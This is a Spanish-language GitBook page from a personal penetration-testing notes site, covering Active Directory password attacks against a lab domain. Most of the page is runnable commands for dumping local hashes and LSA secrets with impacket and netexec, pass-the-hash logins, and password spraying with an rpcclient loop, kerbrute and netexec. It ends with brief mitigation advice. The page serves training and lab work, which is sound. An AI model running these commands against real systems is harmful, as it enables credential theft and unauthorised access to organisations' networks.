d4redevil
  • whoami
  • Active Directory
    • Enumeración
    • PowerShell para gestionar Active Directory
    • PowerView & SharpView
    • Ataques a Kerberos
    • Ataque de contraseñas
    • SMB Relay
    • Token Impersonation
    • Golden Ticket
    • LLMNR Poisoning
    • Mimikatz
    • Grupos privilegiados
    • LAPS
  • Linux
    • Enumeración
    • Escalación de privilegios
    • Transferencia de Archivos
  • Windows
    • Enumeración
    • Escalación de privilegios
      • SeImporsonate
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
      • Backup Operators
      • DnsAdmins
    • Transferencia de Archivos
  • Scripting
    • Powershell
      • Introducción
      • Cmdlet
      • Alias
      • Comentarios
      • Comandos utiles
      • Variables
      • Tuberías (Pipes)
      • Operaciones
      • Estructuras Condicionales
  • OWASP TOP 10 y Vulnerabilidades Web
    • Inyecciones SQL
      • ¿Qué son las Inyecciones SQL?
      • Laboratorio
      • Inyecciones SQL basada en Uniones
      • Inyecciones SQL basadas en booleanos
      • Inyecciones SQL basadas en tiempo
  • Writeups
    • Hack The Box
      • Linux
        • 🟢Easy
        • 🟡Medium
          • Zipping
        • 🔴Hard
        • ⚫Insane
      • Windows
        • 🟢Easy
          • Devel
          • Grandpa
          • Granny
          • Jerry
          • Optimum
          • Legacy
          • Active
          • Sauna
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
    • The Hackers Labs
      • Linux
        • 🟢Principiante
          • Papaya
          • Can You Hack Me?
        • 🟡Avanzado
          • Runners
          • El Candidato
          • El Cliente
        • 🔴Profesional
        • ⚫Experto
          • ⚫Thlcppt_v16
      • Windows
        • 🟢Principiante
          • Cocido Andaluz
          • Ensalá Papas
        • 🟡Avanzado
        • 🔴Profesional
          • BlackGold
        • ⚫Experto
    • Dockerlabs
      • 🔵Muy fácil
      • 🟡Fácil
      • 🟠Medio
        • Database
      • 🔴Difícil
    • VulnHub
      • Linux
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
      • Windows
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
    • HackMyVM
      • Linux
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
      • Windows
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
  • Servicios Comunes
    • TCP
    • UDP
    • FTP (21)
    • SMB (445)
    • MySQL (3306)
    • MSSQL (1433)
  • Cheatsheet
    • Reconocimiento
    • Enumeración
    • Enumeración Web
    • Enumeración de CMS
    • Fuerza Bruta
    • Pivoting
    • Msfvenom
    • Utilidades
    • Fuerza bruta
    • Transferencia de Archivos
  • Contenedores
    • Docker
Con tecnología de GitBook
En esta página
  • Dump Hashes Locales
  • Pass The Password
  • Pass The Hash
  • Dump LSA
  • Password Spraying
  • Pulverización de contraseñas desde Linux
  • Mitigación
  1. Active Directory

Ataque de contraseñas

AnteriorAtaques a KerberosSiguienteSMB Relay

Última actualización hace 1 año

Dump Hashes Locales

En caso de que tener las credenciales de un usuario el cual sea Administrador local, podemos dumpear los hashes locales.

impacket-secretsdump MARVEL.local/pparker:Password123@172.16.0.101

También, podemos utilizar el hash NTLM

impacket-secretsdump MARVEL.local/pparker@172.16.0.101 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

Pass The Password

nxc smb 172.16.0.1 -d MARVEL.local -u pparker -p 'Password123' 

Pass The Hash

Con los hashes anteriores, podemos llevar a cabo otro ataque conocido como Pass The Hash.

nxc smb 172.16.0.101 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71'

Dump LSA

nxc smb 172.16.0.101 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71' --lsa

Password Spraying

En contraste con un ataque de fuerza bruta convencional, donde se intentan muchas contraseñas diferentes para una sola cuenta de usuario, el password spraying implica intentar un conjunto limitado de contraseñas en múltiples cuentas de usuario. Esto se hace para evitar la detección de bloqueo de cuenta, ya que la tasa de intentos de inicio de sesión fallidos para cada cuenta es baja.

El password spraying aprovecha la tendencia de los usuarios a elegir contraseñas débiles o comunes, así como la reutilización de contraseñas entre múltiples cuentas. Los atacantes pueden obtener listas de cuentas de usuario de manera legítima o mediante técnicas de recopilación de información, y luego intentar iniciar sesión en estas cuentas utilizando contraseñas comunes o basadas en diccionarios.

Pulverización de contraseñas desde Linux

Una vez que hemos creado una lista de usuarios validos, es hora de ejecutar el ataque. Rpcclient es una excelente opción para realizar este ataque desde Linux. Una consideración importante es que un login válido no es inmediatamente aparente con rpcclient, con la respuesta Authority Name indicando un login exitoso. Podemos filtrar los intentos de inicio de sesión no válidos buscando Authority en la respuesta. El siguiente Bash one-liner (adaptado de aquí) puede ser usado para realizar el ataque.

rpcclient

for u in $(cat valid_ad_users.txt); do rpcclient -U "$u%Password123" -c "getusername;quit" 172.16.0.1 | grep Authority; done

kerbrute

 kerbrute passwordspray -d MARVEL.local --dc 172.16.0.1 valid_ad_users.txt 'Password123'

Netexec

nxc smb 172.16.0.1 -u valid_ad_users.txt -p 'Password123' | grep +

Mitigación

  • Limitar la reutilización de cuentas

    • Evitar reutilizar contraseñas de Administrador locales.

    • Deshabilitar las cuentas de Invitado (Guest) y Administrador locales.

    • Limitar quien es Administrador local.

  • Utilizar contraseñas robustas.

impacket-secretsdump
impacket-secretdump utilizando el hash TLM
pass the password
Dump LSA